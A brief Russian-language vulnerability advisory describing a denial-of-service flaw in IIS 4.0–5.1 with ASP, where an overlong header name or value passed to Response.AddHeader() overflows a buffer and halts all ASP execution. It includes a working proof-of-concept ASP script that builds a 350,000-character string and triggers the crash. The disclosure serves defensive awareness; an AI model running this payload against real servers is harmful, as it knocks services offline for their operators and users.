В IIS 4.0, IIS 5.0, IIS 5.1 с установленной
поддержкой ASP локальный пользователь
(вообще говоря любой пользователь,
способный выполнить произвольный ASP код)
может вызвать отказ от обслуживания.

Проблема кроется в функции Response.AddHeader(),
она для работы требует имя заголовка и его
значение, если один из этих параметров
будет чрезвычайно длинной строкой (более
35.000 символов), то буфер переполнится и
всякое выполнение ASP кода на сервере
прекратится.

Пример:

<%
Dim i, r
For i=1 to 3500
‘each time append 100 characters
‘line below may wrap
r = r +
"aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaa»
Next

Response.AddHeader «random-header:», r ‘this is where it crashes
%>



Оставить мнение